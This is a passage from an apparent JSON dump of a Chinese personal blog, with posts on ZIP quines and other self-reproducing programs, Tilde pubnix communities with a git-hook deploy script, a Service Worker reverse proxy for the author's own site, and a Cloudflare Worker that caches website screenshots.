Quine的探索在Russ Cox写的《Zip Files All The Way Down》文章中，同样说明了这个原理，而且给出了一个方案，让上述这两个命令除了能够对命令本身的重复以外，还可以添加一些额外数据，这样才能做到构建一个压缩包文件。按照文章的描述，如果用之前谜题的规则来说，我们设头和尾的内容都是“print 0”，那么Cox给出的方案如下：print 0print 2print 0print 2repeat 2 2print 1repeat 2 2print 1print 1print 4repeat 2 2print 1print 1print 4repeat 4 4print 4repeat 4 4print 4repeat 4 4print 4repeat 4 4print 4repeat 4 4print 0print 0print 2repeat 4 4print 0print 0print 2repeat 2 2print 0repeat 2 2print 0我们把这些指令粘贴到quine.zip这个谜题中，就会发现输出和输入完全相同，以此就能验证Cox方案的正确性。除此之外作者还给出了生成的源代码：rgzip.go，只是代码里面到处都是用来构建压缩包的十六进制数字，完全看不懂😂。   另外这个方案是针对使用基于LZ77与哈夫曼编码的DEFLATE压缩算法，所以格式不重要。因此无论是ZIP，还是GZIP，以及TGZ（GZIP压缩后的TAR），其实都是一样的，因为他们都使用的是DEFLATE压缩算法。顺便一提，Matthew Barber写了一篇很棒的文章，通过动画演示并详细讲解了如何实现一个简单的GZIP版ZIP Quine，很值得一看。   还有一点，普通的TAR文件能否实现类似功能呢？从原理来说估计不行，因为TAR文件本身并没有压缩，也不包含指令，就单纯是一堆文件和元数据的拼接，所以就做不到自包含了。   这么来看既然TGZ可以，那是不是在我博客网站的压缩包里放一份和自己一模一样的压缩包是可行的？很遗憾按照这个方法来看是做不到的，由于压缩格式和编码的限制，这个方案在实际实现时发现操作码需要是5个字节，最后发现最多只有类似repeat 64 64这样的指令能够满足要求，因此头尾区最多只能放64-5=59个字节的数据，也就刚刚好能容纳压缩格式需要的内容，几乎没法塞更多东西进去……显然，这些限制导致这种方式对我来说意义就不大了，何况作者的代码我也看不懂……而且还要考虑压缩包还存在校验用的CRC32，需要找满足整个压缩包的CRC32正好在压缩包中的“不动点”。虽然从CRC32的原理来说应该有办法做到通过数学方式解决，但这篇文章的作者因为解决了自包含的问题之后累了，因此放弃继续研究，选择直接暴力破解，毕竟CRC32只有32位，估计思考的时间都要比爆破的时间长吧😂。但如果是这样，即使有方案能存下我博客的数据，也不能在每次网站构建的时候都制作一次了……   虽然Russ Cox写的文章看起来做不到包含更多内容了，但Erling Ellingsen制作的droste.zip却包含了一张图片，说明并不是没办法加入更多数据，只是没有找到正确的方法。在2024年Ruben Van Mello写了一篇论文《A Generator for Recursive Zip Files》，在这篇论文里他不仅解决了包含的额外数据过少的问题，还编写了一个通用工具，能让普通人也能生成这样的压缩包，而且他还创新性的做了一种像衔尾蛇一样的双层嵌套循环压缩包，非常的有意思，所以接下来我打算试试他的方案。   在这篇论文中，里面简述了之前Russ Cox写的内容，也提到了59字节的限制，于是作者对原有的结构进行了一些改动，让操作码可以超出5字节的限制，具体可以看论文的表6，从而解决了只能包含59字节额外数据的限制。但由于DEFLATE压缩格式本身的约束（16位存储块长度以及32KiB回溯窗口），即使能够添加文件，最多也只能额外容纳32763字节的数据（其中包括压缩包所需的文件头）……显然这点空间完全存不下我的博客😭，看来我只能打消这个想法了。但既然都研究了半天，也不一定要存我的博客嘛，可以看看还有没有别的东西可以存？在这之前先继续阅读论文，看完再说吧。制作一个嵌套循环的ZIP Quine在实现了常规的ZIP Quine之后，接下来就是作者的创新点了（如果光是解决存储限制这点创新点估计还不够发论文吧😂）。作者接下来制作了一种循环压缩文件，在压缩包内包含文件A和压缩包A，而压缩包A中则包含文件B和最初的压缩包，从而形成一个循环递归的结构。看论文的描述所说如果把外层的压缩包和内层的压缩包的开头和结尾按照一定的规则交替混合，就可以看作是一个整体，然后按照之前做ZIP Quine那样处理就可以……具体实现的细节得看论文的表10。只不过既然是把两个压缩包看作一个整体的话，按照上面的限制，自然每个压缩包能容纳的数据量就更小了，每个最多只能容纳16376字节的数据……   另外既然这里面有两个压缩包，那么每个压缩包还有自己的CRC32校验和，理论上如果要爆破的话计算难度得是原来的平方，这样难度就太大了。不过作者发现如果把数据的CRC32值取反（即与“0xFFFFFFFF”取异或）然后和原始数据拼到一起，整个数据的CRC32校验和就会被重置为一个固定的值“0xFFFFFFFF”，看起来挺有意思，正常的哈希算法可没有这种特性。因此原本计算难度很大的爆破计算现在就可以和之前一样了…… 话说为什么不让两层的CRC32都这样计算（包括之前单层的ZIP Quine）？这样就不需要爆破了……貌似是因为在普通的ZIP Quine中满足条件的CRC32需要出现两次，所以不能用这个方案吧？    现在所有的理论都足够了，我需要挑一个文件来做这样嵌套循环的ZIP Quine，既然博客的大小不可以……要不然我就用我写过的第一个大项目——Mabbs吧，这个项目的主程序是22KiB，看起来似乎超出了嵌套循环ZIP Quine的限制？其实没有，它的限制指的是压缩后的大小，我这个程序压缩之后是8KiB左右，所以完全没问题。   接下来就该使用论文中提到的生成工具：zip-quine-generator，这是一个Kotlin编写的程序，从发布中可以下载预构建的程序，接下来只要按照README中的描述使用“--loop”参数就可以用这个程序创建嵌套循环的ZIP Quine了。不过它原本的代码不能修改里面生成的压缩包的名字，另外压缩后的文件属性是隐藏文件，还有生成的压缩包中文件的创建时间总是当前时间，以及给文件内填充额外数据的代码里面填的是作者的声明，表示文件是由他论文的所写的生成器生成的……这些情况让我感觉有点不爽，还是希望这些部分能自定义一下，所以我就小改了一下他的代码。顺便一说，Kotlin编译起来还挺简单，直接一句kotlinc src/main/kotlin -include-runtime -d output.jar就可以了，也不需要折腾Maven之类乱七八糟的东西。最终我修改并编译完程序之后就把文件丢到服务器上开始给我爆破CRC32了，花了10个小时就算出来了，倒是比想象中快😂。   （2025.09.26更新）在2025年9月15日的时候，Nate Choe给zip-quine-generator做了个重大贡献，他通过数学的方式让CRC32的值可以不需要通过爆破的方式算出来，现在想要再制作这样的压缩包就可以瞬间生成了……要是我再晚点做这个压缩包就不需要花那么长时间了吧🤣。   最终我给我的Mabbs项目创建了Infinite Mabbs这个发布，生成的文件也可以在这里下载，这也算是不枉我研究半天这个论文了😆。自产生程序的探索说起来自包含压缩包为什么叫做ZIP Quine？其中的Quine是什么意思呢？其实这是一位美国哲学家的名字，他提出了“自指”的理论概念，所以为了纪念他，有类似概念的东西就被称作Quine，具体为什么也可以去看维基百科的说明。现在提到Quine一般代表的就是自产生程序，而自包含压缩包因为实现的原理和自产生程序的原理差不多，所以叫做ZIP Quine。因此接下来我打算探索一下自产生程序，更深入地了解Quine。实现Quine的探索那么什么是自产生程序？简单来说就是程序的源代码和程序的输出完全相同的程序，而且通常来说不允许通过读取/输入源代码的方式实现。按照一般的想法，让程序输出自身就需要输出中有全部代码，整个代码就会变长，而更长的代码就要输出更多，然后代码就会越来越长……所以这么想来似乎成了个死胡同。但其实这种程序实现起来并不复杂，想想ZIP Quine的实现，关键在于指令还需要以数据的形式表现，并且能被引用，这样输出的时候就会连着指令一起输出了。比如用Python的Quine举例：c = 'c = %r; print(c %% c)'; print(c % c)这里的变量中就以数据的形式存储了程序的代码，而在输出的时候除了变量内的代码，又通过引用的方式又把变量的内容放回到赋值的地方，所以它的输出就和原本的代码一样了。   其实Quine的实现思路都差不多是这样，可以在Rosetta Code中找到各种语言实现的Quine，在这其中能够发现大多数高级语言的写法都是类似的，除了一些低级语言以及esolang……这些我也看不懂😂，主要是有些语言没有变量的概念，不知道是怎么区分代码和数据……除了那个网站，在这里还能找到更多由esolang编写的Quine，可以看出来基本上很难看懂，其中最令人望而生畏的还得是用Malbolge写的Quine，这个代码看起来不仅很长，而且像乱码一样。至于什么是Malbolge？这就是Malbolge程序：D'<;_98=6Z43Wxx/.R?Pa代码就像加了密似的，顺便一说这个执行的输出结果是“Mayx”，关于Malbolge的具体细节可以看它的规范，另外虽然这个语言写起来很复杂，但还是有人能用它编出程序的，甚至还有人用Malbolge Unshackled（Malbolge不限内存的变种）写过Lisp解释器，实在是恐怖如斯😨。只能Quine的语言其实想要做出Quine，还有一种更加无聊的方案，那就是设计一种只能Quine的语言🤣。根据Quine的定义，代码输出的结果就是它本身……所以我们可以把任何内容都看作代码，然后这种语言的行为就是输出所有代码……听起来是不是有点无聊？但是想想看如果把Linux中的cat命令当作解释器，就可以实现这种语言了，比如：#!/bin/catHello, world!作为脚本执行的结果就是原样输出这段内容，不过把内容当作代码算不算作弊呢……如果看作是cat的输入显然是作弊，但如果是当作源代码的话应该就不算了吧😋……但这就不是能写出逻辑的语言了。所以说Quine的趣味并不在“能不能实现”，而在于如何在限制条件下实现。正是因为大多数语言不会直接“自我输出”，才会觉得那些精巧的Quine程序如此有意思。Quine Relay的探索还有一个更加复杂的Quine变种是“Quine接力”（Quine Relay），即一个程序输出另一个程序的源代码，另一个程序又输出下一个程序的源代码，最后回到原始程序，就和之前所说的嵌套循环ZIP Quine有点类似。最著名的例子是Yusuke Endoh（这位还是IOCCC的冠军之一）创建的quine-relay项目，它包含了128种编程语言的循环。   这种程序写起来会更复杂一些，不过原理都差不多，通常除了当前运行的部分是可执行代码外，其他的代码都需要以额外包含的数据形式（如字符串）存储在变量中。如果想自己做个类似简单的Quine Relay，除了去看维基百科之外，前段时间我还看到过一个不错的文章，里面就讲了如何用“笨办法”编写Quine和Quine Relay，通过把变量中的内容编码为16进制来避免不同语言可能存在的特殊字符转译问题，思路不错，对于理解如何编写这类程序的问题很有帮助。当然这只是个简单的方案，仅适用于一些常规的编程语言，像上面那个quine-relay项目中甚至还包含Brainfuck之类的esolang，这种估计得要想办法让相对高级一些的语言通过“生成”的方式得到输出下一种代码的代码，而不是简单的赋值了，所以只靠这点知识想去完全理解大佬的作品还是想多了😆。   顺便一说，quine-relay并不是那位大佬唯一的Quine作品，他还做过有冗余的Quine以及动态的Quine，真的是相当的厉害……Polyglot Quine的探索除了Quine Relay之外还有一种很复杂的Quine，叫做Polyglot Quine，与Quine Relay需要在程序执行后才能切换到其他语言接力不同，Polyglot Quine的源代码本身即可同时属于多种语言，而且用这些语言的解释器每个执行后的输出全都一样，都与源代码完全一致。由于不同的编程语言的格式既有些相同之处，也有很多不同之处，所以让同一份代码表示不同语言就会很容易产生歧义，这时候就只能想办法通过一些特别的方式（比如将可能会对当前语言产生干扰的代码看作是注释的方式）来规避语言之间的差异。   Quine本身就已经很困难了，再加上这些限制就变得更加复杂了，所以制作Polyglot Quine的编程语言基本上都得精挑细选，而且通常只有两种语言，比如这段代码就是C和Python的Polyglot Quine，它巧妙利用了C预处理器指令在Python中可视为注释的特性，使两种语言互不干扰，非常有趣。当然并不是说只能是两种语言，像这个项目甚至使用了五种语言（C、Perl、PHP、Python、Ruby），可以说是相当厉害了。除此之外更令人惊叹的则是PyZipQuine项目，在这其中LZ77编码也可以作为一种语言，所以既可以被当作压缩包，也可以作为Python2.7代码，而且二者都是Quine，实在是令人赞叹。感想虽然这次探索最终没能完成让包含博客所有内容的压缩包自包含，但是在探索的过程中我还是收获了不少，尤其是Ruben Van Mello制作的ZIP Quine生成工具，实在是太棒了。很久以前我见到droste.zip这个压缩包的时候，就想整一个属于自己的ZIP Quine，现在我不仅用那个生成工具做了一个，还是对我来说很有意义的第一个项目——Mabbs，而且更关键的还是生成的是比普通的ZIP Quine更高级的嵌套循环ZIP Quine，也算是圆了小时候的心愿了。   另外在探索自产生程序的时候，也发现了一些很有意思的网站，比如Rosetta Code以及Esolang wiki （虽然这个网站里被好多小学生写了一堆无聊的东西😂） ，里面有不少有趣的东西，也算是让我大开眼界了。   所以有的时候探索不一定要完成目标，在这个过程中也会收获到很多不错的东西吧😊。" },{ "title": "在Tilde社区的游玩体验", "category": "", "tags": "tilde, 服务器, git, 体验", "url": "/2025/08/10/tilde.html", "date": "2025/08/10", "content": "Tilde社区，如“家”一般的感受😝起因在上一篇文章里，我说到给我的博客增加了不少网站镜像，也在这个过程中发现了不少Git平台实例。顺便一提，我找到了个不错的仓库，可以全网搜索各种Git平台实例。在这探索的过程中，我发现了一种神奇的社区——Tilde社区，体验之后感觉非常有意思，所以来分享一下。什么是Tilde社区Tilde社区之所以叫Tilde，是因为在类Unix系统（如Linux、BSD）中，波浪号（Tilde）“~”代表家目录。因此，Tilde社区就是基于类Unix系统环境，并且可以公共登录的服务器，又被称为pubnixes。一般这些社区的管理员会预装很多软件、开发环境以及一些公共服务，比如聊天室、邮件、BBS论坛等，这些构成了社区互动的基础。不过并不是所有类似这样提供Shell访问的公共服务器都可以被称作社区，比如知名的免费网站托管商Serv00虽然也提供可以登录的FreeBSD服务器，并且在服务器上安装了非常多的工具和环境，从表面来看和Tilde社区提供的服务几乎一模一样，但是它少了一个很重要的东西，那就是社区，它的权限管理非常严格，不允许服务器的用户互相串门，也没有互相交流的平台，而且它的本质是商业服务（尽管是免费的），所以它不算Tilde社区。   至于Tilde社区的加入方式，一般可以通过填写在线申请表、私信或发送邮件申请，有些比较有特色的社区会用SSH交互等方式。审核通过后，管理员就会在服务器上为你创建账户，即可获得属于自己的“家”，一般的Tilde社区在这个过程中不需要付一分钱，因为他们通常都是反商业化的，如果遇到了需要付钱才能激活账户的公共服务器，那就不是Tilde社区，即使它历史悠久，可能是别的什么东西😆。   那么在哪里可以找到它们呢？有一个不错的网站，叫做tildeverse，这不仅是一个Tilde社区的集合，它自身也提供了很多服务。不过总的来说各个社区之间也是互相独立的，tildeverse只是提供了一个平台让大家可以互相沟通，所以这个网站叫做“loose association”，就相当于博客中的博客圈一样。   于是我在tildeverse的成员列表中随便挑选了几个Tilde社区提交了注册申请，过了一段时间申请通过了，那么接下来就来说说我在Tilde社区的体验吧。Tilde社区的体验虽然我加入了不少Tilde社区，不过各个社区提供的服务都差不多，首先最重要的就是个人主页，一般Tilde社区基本上都会提供一个像~/public_html这样的目录存放个人主页的网页文件，并且可以通过类似example.com/~username这样的地址访问，还有些社区会允许通过二级域名的方式访问，类似username.example.com这样，像我博客好多地方写的都是从根路径开始，就很适合用二级域名的方式。这些主页大多也支持使用PHP之类的网页，不过不像虚拟主机那样有个面板可以轻松安装扩展和切换版本，有些可能要自己写配置文件，有些可能要管理员才可以操作，毕竟是社区，所以不太注重用户体验。   当然除了HTTP协议的个人主页，通常他们还可以创建一些Gemini协议和Gopher协议的个人主页，这些协议不支持普通浏览器访问，需要用ELinks之类的文本浏览器才能打开，这个浏览器甚至可以在终端里用鼠标操作😆。不过因为协议非常简单，所以内容也就只能整些文本内容了。   除了个人主页外，一般还会提供编写博客的程序，比如bashblog，用这个编写好之后就可以直接生成HTML网站，能直接发布到自己的主页上让别人访问。这个脚本还是纯Bash的，就和我当年的Mabbs一样，看起来还挺酷，当然功能上肯定比不上正经的静态博客生成器😆。   当然博客是一方面，还可以写微博，他们一般提供一款叫twtxt的软件，用这个软件可以使用命令发微博，还能关注其他人，查看时间线，而且这还是去中心化的，可以跨服务器进行关注，感觉就和Mastodon一样。   除此之外作为社区当然就会有聊天室和论坛了，不过这些聊天室和BBS论坛通常不会像大多数人使用的那种通过Web或者图形界面来查看，而是纯文本的那种，比如论坛通常会用Bulletin Butter & Jelly，聊天室会用IRC，可以使用WeeChat，只是我对IRC的印象不太好，在终端使用的IRC客户端没有一个使用体验好的😅，相比于其他在终端使用的软件，操作通常只需要一些快捷键，而且界面上通常会有提示，而IRC客户端就只能敲命令，而且还担心敲错了当成普通内容发出去……所以尽管我加入了Tilde社区，受限于聊天软件的使用体验以及我的英文水平，所以并不能和在服务器上的其他人聊天，没法参与到社区中，这么来看似乎我只能把Tilde社区当作普通的共享服务器来看待了😭。   在Tilde社区中既然都是用类Unix系统，自然大都是会写程序的人，所以托管代码也很重要，不过因为大多Tilde社区的主机性能很垃圾，所以很多都不会提供Git平台服务，即使有可能也只会提供Gitea，像GitLab这种对服务器要求比较高的基本上就不会有了。但很多人可能对Git有误解，其实绝大多数情况下都不需要Git平台来托管代码，之所以用Gitea、GitLab的工具是因为它们有比较完整的用户管理以及代码协作能力，比如Issue和Wiki之类的，但是大多数人其实根本没必要用到这些功能，有问题发邮件就好了，像Linux的开发就完全没有用Gitea、GitLab之类的平台。所以在Tilde社区中托管代码非常简单，直接新建个文件夹，执行git init --bare，那就是个仓库，另外很多Tilde社区提供cgit方便让公众在网页上查看和克隆自己的仓库，一般只要放到~/public_git目录下就可以。至于自己如果想要提交代码，可以用git remote add tilde ssh://example.com/~/public_git/repo.git添加远程仓库，本地改完之后push上去就可以。   不过用那些Git平台还有一个地方可能会用到，那就是CI/CD，直接用命令创建的仓库它可以做到CI/CD吗？其实是可以的，Git有hooks功能，如果想要类似CI/CD的功能就可以直接用post-receive这个钩子，提交完成之后就会执行这个脚本，所以接下来就讲讲我是如何用Git hooks在服务器上自动部署我的博客吧。使用Git hooks自动部署博客我的博客使用的是Jekyll框架，这是一个使用Ruby编写的静态博客生成器。所以要想构建我的博客至少要有Ruby的环境，还好几乎所有的Tilde社区都预装了，不用担心环境的问题。   不过Tilde社区一般不提供root权限，所以Ruby的包需要放到自己的目录下，比如可以执行这样的命令：bundle2.7 config set --local path '/home/mayx/blog-env'然后再在我的仓库下执行bundle2.7 install就可以了。   接下来就需要编写构建的脚本，这个倒是简单，直接用我的部署脚本改改就行：#!/bin/bashcd /home/mayx/rm -rf public_htmlgit --work-tree=/home/mayx/blog --git-dir=/home/mayx/blog.git checkout -fcd blogmkdir Mabbscurl -L -o Mabbs/README.md https://github.com/Mabbs/Mabbs/raw/main/README.mdbundle2.7 exec jekyll build -d ../public_htmltar czvf MayxBlog.tgz --exclude-vcs ../public_html/mv MayxBlog.tgz ../public_html/写完之后把这个脚本放到仓库的hooks/post-receive下，然后加上执行权限就可以用了，以后每次push之后都会直接更新我在Tilde社区的主页，也就是我的镜像站。这样部署不像一般CI/CD还要额外装环境，直接使用提前装好的环境，构建速度会快不少。   不过既然有机会构建了，我就可以把一些不支持构建的Pages用起来了，有些Forgejo实例支持Pages功能，但是仓库里只能包含构建后的代码，还有Bitbucket Cloud也是一样的问题，所以我可以把构建后的文件夹转为仓库，然后推送到这些Git平台上。   考虑到我的网站每次构建基本上所有的页面都有改动，因此我不打算保留提交记录，所以我每次都会重新初始化git仓库，不过在我实际测试的时候，发现钩子触发的脚本执行git init的时候创建的是裸仓库……查了一下貌似是环境变量的问题，只要把GIT_DIR变量删掉就没问题了，以下是实际的代码：cd ../public_html/unset GIT_DIRgit initgit add .git commit -m \"update\"git remote add codeberg ssh://git@codeberg.org/mayx/pages.gitgit remote add gitgay ssh://git@git.gay/mayx/pages.gitgit remote add bitbucket ssh://git@bitbucket.org/unmayx/unmayx.bitbucket.io.gitgit push -f codeberg mastergit push -f gitgay mastergit push -f bitbucket master除了这些Pages之外，还有一些平台只支持使用他们自己的软件上传网站代码，比如surge，既然我可以在构建的时候执行命令，那就顺带一起上传吧，比如我可以这样执行：/home/mayx/blog-env/node_modules/surge/bin/surge /home/mayx/public_html/ mayx.surge.sh其实除了这个之外我还想上传到sourcehut pages，这个也需要用他们自己的软件上传，但是sourcehut pages的CSP太严格了，居然禁止脚本访问其他网站😭，这样我的文章点击计数、文章推荐、AI摘要之类乱七八糟的功能就全用不了了，所以只好作罢……感想总的来说，这次在Tilde社区的各种体验还挺有意思，虽然没能和各个社区的成员进行对话，但是在探索的过程中，也了解到了不少新知识，而且也给我的博客增加了不少镜像。不知道会不会有哪个社区成员在闲逛的时候看到我的博客然后对里面的内容感兴趣😝……要是有哪个成员看到然后给我评论，那也算是社区互动吧😋。虽然我的文章内容都是中文，但现在翻译软件也足够强大了，应该不至于拦住外国人。只是在国内似乎没有见过类似的社区，在国内也有的话，那就可以用中文和大家对话了吧。" },{ "title": "用Service Worker实现一个反向代理", "category": "", "tags": "浏览器, Service Worker, Worker, 反向代理", "url": "/2025/08/01/sw-proxy.html", "date": "2025/08/01", "content": "现代浏览器真是强大，可以替代一些服务器的功能了！起因前段时间在和群友聊天的时候，提到了我博客的分发方案，这么多年过去之后我已经在很多平台上分发了我的博客，不过这只是多重冗余，并不算去中心化（虽然我也有向IPFS同步，不过IPFS还得pin，也不太可靠）……所以这么看来，我的博客似乎还不算极其可靠😂？但其实不完全是这样。因为除了向不同平台的分发，我的博客还有一个全文搜索的功能。更重要的是，之前做文章推荐功能时，会把整个博客所有文章的文字存到访客浏览器的localStorage中。这么说来，只要有人访问了我博客的文章，他们的浏览器中就会保存一份我博客文章的完整文本副本。从这个角度看，可靠性应该算是相当高了吧？   不过我之前的分发方案里还记录了一点，在GitHub Pages以外的平台我还打包了一份全站生成后的代码，之所以要全站打包，也是希望我的博客能尽可能的分发，考虑到几乎所有的Linux发行版一定有tar，而不一定有zip，所以我最终打包成了tgz格式。如果能让访客下载这个全站打包好的副本，相比于浏览器里只存储了文章文字的全文数据，这应该是一个更好的备份方式吧？毕竟我的博客本身也是我的作品……所以这个压缩包到底有什么地方可以用到呢？   这时候我想起来，现代的浏览器功能已经非常强大了，甚至在浏览器里直接运行一个Web服务器也完全没问题。如果能让访客在浏览器里下载那个压缩包并运行一个Web服务器，那就相当于在他们本地设备上部署了一份我的博客副本。这样一来，除了我自己搭建的网站之外，这些访客的本地也运行着一个我的博客实例😆（当然，这份副本只有访客自己能看到）。研究实现方案想要在浏览器上运行Web服务器其实很简单，那就是使用Service Worker，它可以完全离线在浏览器上工作。格式的话和以前写过的Cloudflare Worker非常相似，毕竟Cloudflare Worker就是模仿Service Worker的方式运行啊😂，所以我要是想写Service Worker应该很简单。   有了执行的东西之后就是存储，在Service Worker上存储可以用Cache Storage，用它的话不仅可以保存文件的内容，还可以保存响应头之类的东西，用来和Service Worker配合使用非常的方便，不过既然是Cache，它的可靠性就不能保证了，浏览器很可能在需要的时候清除缓存内容，所以相比之下用IndexedDB应该会更可靠一些。   那么接下来就该处理我的tgz文件了，tgz的本质是tar文件被gzip压缩之后的东西。浏览器解压gzip倒是简单，可以用Compression Stream API，但它也只能处理gzip了……对于tar的处理似乎就必须用第三方库。而tar的库在网上搜了搜似乎很少，网上找了个tarjs库，文档写的也看不懂，⭐️也很少，看来是有这个需求的人很少啊，而且还要用现代JS那种开发方式，要用什么npm之类的。在上一篇文章我就说过我不是专门写前端的，对在自己电脑上安装Node.js之类的东西很反感。后来问AI也完全写不出能用的代码，估计这个功能还是太小众了……另外又想到除了这个问题之外还要处理网站更新的时候该怎么通知Service Worker之类乱七八糟的事情……所以只好作罢😅。使用Service Worker进行反向代理这么看来离线运行我的博客似乎有点麻烦，不过既然都研究了一下Service Worker，不如想想其他能做的事情……比如当作反向代理？虽然在浏览器上搞反向代理好像意义不是很大……但值得一试。我之前见过一个项目叫做jsproxy，它是用Service Worker实现的正向代理，这给了我一些启发。我在之前研究分发方案的时候发现了一些模仿GeoCities的复古静态网站托管平台，比如Neocities和Nekoweb。它们需要通过网页或API才能上传网站，不太方便使用CI/CD的方式部署。但是我又觉得它们的社区很有意思，所以想用Service Worker的方式反代到我的网站，显得我的网站是部署在它们上面一样。   这个做起来非常简单，其实就和我以前用Cloudflare Worker搭建反代几乎完全一样，遇到请求之后直接通过Fetch获取内容然后再返回就行，唯一不同的就是浏览器存在跨域策略，在跨域时只有对应网站存在合适的响应头才可以成功请求，还好我用的Pages服务大多都允许跨域。但是在我实际测试的时候发现这个允许跨域的等级不太一样，比如GitHub Pages的响应头里包含Access-Control-Allow-Origin: *，但是不允许OPTIONS方式请求，另外如果要修改请求头，在响应头里还要一一允许相应的请求头才行……当然对于这种问题解决起来很简单，就和我之前写的订阅源预览一样，用cloudflare-cors-anywhere搭建的CORS代理就可以，有了这个就可以轻松使用Service Worker反代其他网站了。   当然对我来说其实有Access-Control-Allow-Origin: *就够了，我也不需要花里胡哨的请求方式，也不需要在请求头和请求体里加什么莫名其妙的东西，所以对我来说直接请求我的某一个镜像站就可以，于是代码如下：   index.html<!DOCTYPE html><html><head>    <meta charset=\"UTF-8\" />    <title>Mayx的博客</title></head><body>    <script>        // 注册 Service Worker        if ('serviceWorker' in navigator) {            navigator.serviceWorker.register('/sw.js')                .then(registration => {                    console.log('Service Worker 注册成功:', registration.scope);                    // 刷新网页                    location.reload();                })                .catch(error => {                    console.error('Service Worker 注册失败:', error);                    location=\"https://mabbs.github.io\";                });        } else {            location=\"https://mabbs.github.io\";        }    </script>    <h1>Redirecting…</h1>    <a href=\"https://mabbs.github.io\">Click here if you are not redirected.</a></body></html>sw.jsconst TARGET_SITE = '被反代的网站'; //也可以用CORS代理self.addEventListener('install', event => {    // 强制立即激活新 Service Worker    event.waitUntil(self.skipWaiting());});self.addEventListener('activate', event => {    // 立即控制所有客户端    event.waitUntil(self.clients.claim());});self.addEventListener('fetch', event => {    if (new URL(event.request.url).origin == self.location.origin) {        event.respondWith(handleProxyRequest(event.request));    }});async function handleProxyRequest(request) {    try {        // 构建目标 URL        const targetUrl = new URL(request.url);        const proxyUrl = TARGET_SITE + targetUrl.pathname + targetUrl.search;        // 创建新请求（复制原请求属性）        const proxyRequest = new Request(proxyUrl, {            method: request.method,            // headers: request.headers,            // body: request.body        });        // 发送代理请求        const response = await fetch(proxyRequest);        // 返回修改后的响应        return new Response(response.body, {            status: response.status,            statusText: response.statusText,            headers: response.headers        });    } catch (error) {        console.error('Proxy error:', error);        return new Response('Proxy failed', { status: 500 });    }}最终的实际效果： https://mayx.nekoweb.org感想虽然折腾了半天没能增强我博客的可靠性……但是体会到了现代浏览器的强大之处，难怪前几年会提出ChromeOS和PWA之类的东西，原来浏览器功能还是相当强大的，用了Service Worker以后即使是纯前端也可以有和使用服务器一样的体验，在过去的浏览器中要是想实现这样的功能……好像也不是不可能😂，用AJAX加服务器使用伪静态策略其实是可以做到的……其实Service Worker的功能更多还是在离线时使用的，我这个例子好像没体现它的优势😆。   但总的来说相比以前想要实现这种反代的功能代码还是更清晰，也更简单了，也许以后如果有机会我又有心思让博客在访客浏览器上离线运行，那就可以体现Service Worker真正的优势了🤣。" },{ "title": "使用Cloudflare制作自动更新的网站预览图", "category": "", "tags": "Cloudflare, Workers, 网站截图, 自动化", "url": "/2025/07/24/screenshot.html", "date": "2025/07/24", "content": "Cloudflare的功能真是越来越多了，而且还免费！起因前段时间我在登录Cloudflare的时候发现Workers上多了一个“浏览器呈现”的功能（可能已经出来一段时间了，不过之前一直没关注），看介绍，这个功能可以让Worker操作运行在Cloudflare服务器上的浏览器。这功能挺有意思，而且免费用户也能用，不如想个办法好好利用一下。   一般来说这个功能可以干什么呢？既然是在AI盛行的时候出现……估计是为了搞Agent之类的吧，不过看文档对免费用户来说一天也只有10分钟的使用时间，估计也没什么应用价值……那除了这个之外还能做些什么？我发现有好多博客主题喜欢给自己的README里添加一个能查看主题在多种设备上显示效果的预览图，以展示主题的自适应能力。那么既然现在能在Cloudflare上操作浏览器，那么我也可以做一个类似的，而且这个预览图还可以自动更新。制作自适应的网站预览既然打算做预览图，那么我应该用什么方案？按照不同尺寸的视口截几张图再拼起来吗？这显然就太复杂了，况且在Cloudflare Workers中处理图片也相当困难。这时我想起来曾经见到过一个工具，只要输入网址，就可以在一个页面中同时展示网站在四种不同设备（手机、平板、笔记本电脑、台式机）上的显示效果，叫做“多合一网页缩略图”，实现原理是使用iframe和CSS缩放模拟多种设备视口。搜了一下发现这套代码被不少网站使用，所以就随便找了其中一个工具站把代码和素材扒了下来，稍微改了一下，然后放到GitHub上，方便等一会用Cloudflare访问这个部署在GitHub Pages上的页面来进行截图。使用Cloudflare浏览器呈现进行截图接下来截图就简单了，不过Cloudflare有两种截图的办法，用Workers的话可以直接用Puppeteer之类的库连接浏览器，但用这个库需要安装，要本地搭环境……我毕竟不是专门搞JS开发的，一点也不想在本地安装Node.js环境，所以就不想用这种方式。另外一种是通过调用Cloudflare的接口，这种非常简单，只需要填几个参数请求就行，唯一的问题就是要填一个Token……我一直觉得Worker调用Cloudflare自己的服务不应该需要Token之类的东西，毕竟内部就能验证了，没必要自己搞，但是我看了半天文档貌似无论如何只要想调接口就必须搞个Token……那没办法就搞吧，其实也很简单，只需要在“账户API令牌”里添加一个有浏览器呈现编辑权限的令牌就行。   至于展示……这个接口调用比较耗时，而且一天只能调用10分钟，截图的话估计也就够30次左右，还有每分钟3次的限制😓，所以实时更新肯定是不行了，图片肯定得缓存，一天更新一次感觉应该就够了。另外次数这么少的话写成接口给大伙用貌似也没啥意义，所以我就把地址写死了，于是以下就是最终实现的代码：export default {  async fetch(request, env, ctx) {    const cache = caches.default;    const kv = env.SCREENSHOT;    const url = \"https://mabbs.github.io/responsive/\";    const date = new Date().toISOString().split(\"T\")[0];    const cacheKey = url;    const datedKey = `${url}?${date}`;    // 工具函数：构建 Response 对象    const buildResponse = (buffer) =>      new Response(buffer, {        headers: {          \"content-type\": \"image/png\",          \"cache-control\": \"public, max-age=86400, immutable\",        },      });    // 工具函数：尝试从 KV 和 Cache 中加载已有截图    const tryGetCachedResponse = async (key) => {      let res = await cache.match(key);      if (res) return res;      const kvData = await kv.get(key, { type: \"arrayBuffer\" });      if (kvData) {        res = buildResponse(kvData);        ctx.waitUntil(cache.put(key, res.clone()));        return res;      }      return null;    };    // 1. 优先使用当日缓存    let res = await tryGetCachedResponse(datedKey);    if (res) return res;    // 2. 若缓存不存在，则请求 Cloudflare Screenshot API    try {      const payload = {        url: url,        viewport: { width: 1200, height: 800 },        gotoOptions: { waitUntil: \"networkidle0\" },      };      const apiRes = await fetch(        `https://api.cloudflare.com/client/v4/accounts/${env.CF_ACCOUNT_ID}/browser-rendering/screenshot?cacheTTL=86400`,        {          method: \"POST\",          headers: {            Authorization: `Bearer ${env.CF_API_TOKEN}`,            \"Content-Type\": \"application/json\",          },          body: JSON.stringify(payload),        }      );      if (!apiRes.ok) throw new Error(`API returned ${apiRes.status}`);      const buffer = await apiRes.arrayBuffer();      res = buildResponse(buffer);      // 后台缓存更新      ctx.waitUntil(Promise.all([        kv.put(cacheKey, buffer),        kv.put(datedKey, buffer, { expirationTtl: 86400 }),        cache.put(cacheKey, res.clone()),        